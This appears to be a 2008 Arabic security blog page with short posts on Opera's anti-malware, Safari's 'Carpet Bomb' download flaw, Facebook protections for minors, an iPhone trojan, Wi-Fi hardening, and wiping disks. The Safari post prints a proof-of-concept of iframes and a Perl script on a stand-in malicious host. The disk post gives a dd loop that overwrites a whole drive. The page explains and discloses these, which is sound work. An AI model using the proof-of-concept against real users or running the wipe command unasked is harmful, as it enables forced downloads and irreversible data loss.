الأمن الإلكتروني

متصفح Opera 9.5

نشرت تحت تصنيف أخبار by Raed على يونيو 7th, 2008

يوم الجمعة و الموافق 6 June، أطلقت Opera متصفحها الجديد 9.5 ( لبيئة Windows و بيئة Mac ). و أحد التطويرات في النسخة هو توفير نسخة مدمجة من Anti-malware من الشركة Haute Secure.
جاءت النسخة بعد اطلاق النسخة الثالثة من متصفح Firefox و الذي يعتمد في محاربته للـ Anti-malware على Google و StopBadWare.
تقول Haute Secure أن عرض حمايتها أفضل و السبب اعتمادهم على أشخاص معتمدين ذو خبرة اللذين يحددون صلاحية الموقع.
و فيه تجربة قامت بها CNET، اكتشفت أن بعض المواقع لا تزال غير محجوبة من قِبل Opera 9.5. و السبب قالته Haute Secure بأن APIs الموفّر من قٍبل المواقع المُوفرّة للقوائم مثل PhishTank لا تتحدث إلا بعض التأكد من المعلومة، أما Google تقوم بتصنيفها بمفردها ، مما يجلعها سريعة.

Tagged with: , , , , , , ,
لا توجد أية تعليقات بعد

مشكلة Carpet Bomb في متصفح Safari

نشرت تحت تصنيف برامج, مخاطر, مواقع by Raed على مايو 16th, 2008

مشكلة اكتشفها Nitesh Dhanjani، التي تسمح بأي موقع أن يملأ مجلد معيّن بملفات معينة، قد تكون مثلاً malware. و تكمن الفكرة بأن برنامج Apple Safari لا يسأل عن رأيي المستخدم عند ضغطه لرابط ملف، لذلك يقوم Safari بتحميل الملف تلقائياً في مجّلد التحميل الإفتراضي (( سطح المكتب في حالة Windows أو مجلد Downloads في OSX )).

تخيّل أن الصفحة المشبوهة هي http://malicious.example.com/ كما ذكر Nitesh Dhanjani في موضوعه، سيقوم مبرمج الموقع بوضع أمر iframe بشكل مكثّف في ملف html، بشكل مثلا:

<HTML>
<iframe id=”frame” src=”http://malicious.example.com/cgi-bin/carpet_bomb.cgi”></iframe>
<iframe id=”frame” src=”http://malicious.example.com/cgi-bin/carpet_bomb.cgi”></iframe>
<iframe id=”frame” src=”http://malicious.example.com/cgi-bin/carpet_bomb.cgi”></iframe>




<iframe id=”frame” src=”http://malicious.example.com/cgi-bin/carpet_bomb.cgi”></iframe>
</HTML>

و افرض أيضاً أن الملف http://malicious.example.com/cgi-bin/carpet_bomb.cgi يحوي على

#!/usr/bin/perl
print “Content-type: blah/blah\n\n”

عند دخول المتصفح للصفحة بمتصفح Safari، المتصفح لن يقدر على معالجة Content-type لـ blah/blah. لذلك سيقوم ٍSafari تلقائياً بتحميل الملف و بدون إذن المستخدم إلى سطح المكتب ((في حالة إستخدامه لنظام Windows)). و هذه صورة توضيحية:

safari carpet bomb

إذن، كيف يمكن استخدام هذا الضعف ؟
كما هو موجود في مدونة Zero Day،يستطيع مبرمج الموقع بوضع malwares على شكل “My Computer” و اسمها “My Computer”، بحيث الضغط عليها سيؤدي إلى مشاكل.

هل المشكلة تُعالج حاليا من قبل مبرمجي Safari؟
لا، و السبب هو ردّهم

…the ability to have a preference to “Ask me before downloading anything” is a good suggestion. We can file that as an enhancement request for the Safari team. Please note that we are not treating this as a security issue, but a further measure to raise the bar against unwanted downloads. This will require a review with the Human Interface team. We want to set your expectations that this could take quite a while, if it ever gets incorporated.

أي أن المشكلة ليست مشكلة أمنية و إنما هي طريقة لمنع تحميل الملفات الغير مرغوب بها.

Tagged with: , ,
لا توجد أية تعليقات بعد

facebook و بروتوكولات لحماية من تحت الـ 18

نشرت تحت تصنيف أخبار by Raed على مايو 15th, 2008

قام موقع Facebook مؤخراً بوضع قوانين لحماية من هم أقل عمراً من 18 سنة، و ذلك بعد الشكاوي التي أصدرها آباؤهم بأن الموقع قد يمهّد الطريق للإساءة إلى أولادهم.

إحدى الطرق التي قد يبدأ فيها الشخص بالإساءة لصغار السن هي بتغيير عمره. Facebook أخذت هذه النقطة في الإعتبار، حيث منتعت المستخدمين الأكبر من 18 من نغيير أعمارهم إلى أقل من 18، و وصع أنظمة حماية تستطيع الشركة بواسطتها معرفة العمر المُفترض للشخص عن طريق متابعة أعمار أصدقاء الضخص المُضافين لديه. 

هذه قائمة ببعض ما قامت الشركة بتحسينه:

  1. أدوات للتحقق من عمر و شخصية المستخدم،
  2. إنذارات يتم إطلاقها عند خطورة قيام طفل بإعطاء معلومات شخصية لبالغ مجهول،
  3. إزالة الغير لائق من مجموعات أو محتويات من الموقع،
  4. إزالة الروابط إلى مواقع إباحية.
Tagged with: ,
لا توجد أية تعليقات بعد

كيف تحذف معلوماتك من القرص الصلب

نشرت تحت تصنيف كيف ... ! by Raed على مايو 12th, 2008

إذا كنت من مستخدمي اللينكس، قد تتوقع أن أمر rm كافي لحذف الملفات. يقوم الأمر rm بحذف الملفات و لا يضمن لك حمايتها من عدم استرجاعها في حالة سرقة القرص الصلب.

إذا أردت مسح (و بشكل أبدي) جميع البيانات ( و ليس جزء منها)، قم باستخدام الأمر dd. كيف ؟؟

قم بتطبيق الأمر:

for (( i = 0;i<10;i++ )); do
 dd if=/dev/urandom of=/dev/hda && dd if=/dev/zero of=/dev/hda
done

قم باستبدال علامة القسم hda بالعلامة اللتي تستخدمها لقرصك الصلب.

هذا الأمر يقوم بكتابة معلومات عشوائية على القرص الصلب، ليس مرة و لا مرتان، بل عشر مرات ليضمن إستحالية استرجاع المعلومات.

العملية قد تأخذ بعض الوقت (بالأيام أو بالأسابيع) باختلاف قدرة الجهاز و حجم القرص

Tagged with: , ,
لا توجد أية تعليقات بعد

هل هي بداية للحزم الخبيثة لجهاز iPhone ؟

نشرت تحت تصنيف أجهزة, تروجان, مخاطر by Raed على مايو 12th, 2008

ظهرت أول الحزم الخبيثة لجهاز Apple iPhone. اسم الحزمة “iPhone firmware 1.1.3 prep” و التي وُصِفت بـأنها:

An important system update. Install this before updating to the new 1.1.3 firmware

أي، أنها تحديث مهم للنظام، و تطلب من المستخدم تنصيب الحزمة قبل تحميل آخر firmware.

الحزمة لا تظهر أي أثر على الجهاز، بل عند حذفها تقوم بحذف بعض البرامج، و السبب أن وقت تحميل الحزمة، تقوم بتحميل و استبدال ملفاتها ببعض ملفات البرامج الأخرى. بعض البرامج التي أثبتت التقارير أنها تأثّرت بالحزمة Erica’s Utilities و OpenSSH.

تقنيّاً، هذا أول Trojan Horse لجهاز iPhone. لكن، هذه الحزمة تُعتبر غير مؤذية “نوعاً ما” للمستخدم، لأن حل المشكلة يكمن في تحميل البرنامج المحذوف مرة أخرى.

هذا التروجان بُرمج بواسطة طفل في الحادي عشر من العمر، وضعه على موقع أُغلٍق مؤخرا بعض أن أبغلت الشركات عن هذا التروجان.

إذا، هل أنت في مأمن منه ؟
لا، و السبب هو إمكانية ظهور مواقع تستضيف الحزمة لديها و تُجبرك لتحميلها.

Tagged with: , ,
لا توجد أية تعليقات بعد

خطوات لحماية الشبكات اللاسلكية

نشرت تحت تصنيف كيف ... ! by Raed على مايو 1st, 2008

السلام عليكم …

هذه خطوات أساسية يجب تطبيقها لحماية شبكتك اللاسلكية من الإختراقات

  1. تغيير الـ SSID،
    السبب : عادة تضع الشركة المصنّعة للجهاز اسمها و كود، و بواسطة معرفة إسم الشركة، يستطيع الشخص، و بواسطة اسم المستخدم و الكلمة السرية الإفتراضية، الدخول إلى الجهاز بحكم أن معظم الأشخاص لا يقوموا بتغيير الإسم و الكلمة السرية.
  2. تغيير إسم المستخدم و الكلمة السرية لل Access Point،
    السبب: كما ذُكر في (1)، في حالة عدم تغييرها ، سيقوم المخترق بوضع ، و بشكل مباشر، اسم المستخدم و الكلمة السرية الإفتراضية كمحاولة أولية.
  3. إضعاف قوة بث الإشارة،
    السبب: في حالة استخدامك لـ Access Point في محيط صغير نسبياً، لن تحتاج إلى الخروج من ذاك المحيط الذي قد يحوي بأي شكل على مخترق. العديد من الأجهزة تدعم هذه الخاصية، بحيث تقوم بإضعاف الإشارة و التي بدورها لن تصل إلى خارج المحيط.
  4. تفعيل التشفير بواسطة الـ WPA،
    السبب: التشفير بواسطة الـ WEP يمكن اختراقه في تقريبا 30 ثانية من شخص متمكّن. و لكن الأفضل هو تفعيل الـ WPA2 و خوارزمية الـ “TKIP+AES” و استخدام كلمة سرية، لكن تحتاج إلى تحديث نظامك لاستخدامه ( هذا التحديث لمستخدمي XP ) و من المتوقع احتياجك لتحديث تعريف كرت الشبكة.
  5. تغيير الكلمة السرية من فترة لأخرى،
    السبب: مهما كان النظام المستخدم للتشفير، فهوا قابل للإختراق. لكن عند تغييرك للكلمة السرية أو ما يعرف بالـ Key فإنك تُفقد الأمل للشخص المخترق و جعله غير قادر على كشف كامل البيانات.
  6. استخدام الجدار الناري.
    السبب: تقريبا جميع الأجهزة الحالية تحوي على جدار ناري داخلي، قم باستخدامه لحماية الشبكة.

سوف أقوم بكتابة موضوع عن بعض المفاهيم الخاطئة عند البعض فيما يتعلق بحماية الشبكات اللاسلكية، مثل: إخفاء الـ SSID و غيره.

Tagged with: , , , ,
لا توجد أية تعليقات بعد